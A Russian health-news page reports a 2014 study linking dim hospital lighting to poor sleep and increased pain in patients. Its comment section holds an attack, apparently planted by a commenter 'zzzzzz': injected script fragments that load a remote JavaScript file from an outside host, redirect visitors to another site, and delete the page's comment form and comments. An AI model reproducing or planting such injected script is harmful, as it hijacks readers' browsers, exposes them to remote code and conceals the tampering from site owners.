Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Может ли свет вылечить бо...  >>  Может ли свет вылечить болезнь?
 
Обратная связь
 

Может ли свет вылечить болезнь?

Размер шрифта
27 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Результаты недавнего исследования показали, что изменение света в больничных палатах может улучшить самочувствие пациентов, в частности – бороться с усталостью и болевым синдромом.

Может ли свет вылечить болезнь

Известный факт: большинство людей чувствуют себя лучше в солнечный погожий денек, нежели во время сумрачного ненастья. Ученые считают, что это связано с воздействием света.

Когда же человек попадает в больницу, он оказывается в абсолютно чуждой среде. Все окружающее ему претит: незнакомая обстановка, убранство, пища, наконец, сомнительный повод, по которому он там оказался – все это грубо вторгается в хрупкие чертоги нашего самочувствия, ухудшая сон и расположение духа. Доктор Эстер Бернхофер и ее коллеги из Кливлендского университета (штат Огайо, США) решили выяснить, какую роль в формирования этого негатива играет освещение.

С этой целью они разработали дизайн исследования, целью которого стал поиск связи между освещением, настроением, качеством сна и интенсивностью болевого синдрома в больничных условиях. В течение года авторы собирали информацию о 23 женщинах и 17 мужчинах, которые были госпитализированы в различные клиники США. Основным экспериментальным мероприятием стало одномоментно-длительное (в течение 72 часов) измерение воздействия световых волн и параллельная оценка структуры циркадианных ритмов (иначе говоря – анализ цикла «сон-бодрствование»). Колебания настроения выявлялись исходя из результатов анкетирования, а интенсивность болевого синдрома обязательно отражалась в медицинской документации.

Исследователи выяснили, что пациенты, находясь в клинике, преимущественно подвержены воздействию света низкой интенсивности. Это указывает на нехватку естественного колебания яркости, которая свойственна световому дню. Днем – светло, вечером – темно: эта флуктуация необходима для нормального обеспечения циркадианных  ритмов. Больничная среда стирает этот электроволновой контраст. Это приводит к тому, что пациенты хуже спят, а это, в свою очередь, обуславливает усиление болевого синдрома.

«Мы хотим подчеркнуть, что эти результаты являются приблизительными. Необходимо выявить все возможные последствия модификации светового режима в клинике для здоровья пациентов», – утверждает доктор Бернхофер. «Однако мы убеждены, в дальнейшем грамотная световая гигиена станет простым и эффективном способом улучшения качества жизни людей в условиях больничной палаты».

Результаты данного исследования были опубликованы в журнале Journal of Advanced Nursing.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как выспаться   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   В какой день нельзя идти в больницу!   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Почему вы не можете выспаться. Часть 2
Проблемы, с которыми справится секс. Часть 4
Как спать с бронхитом

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.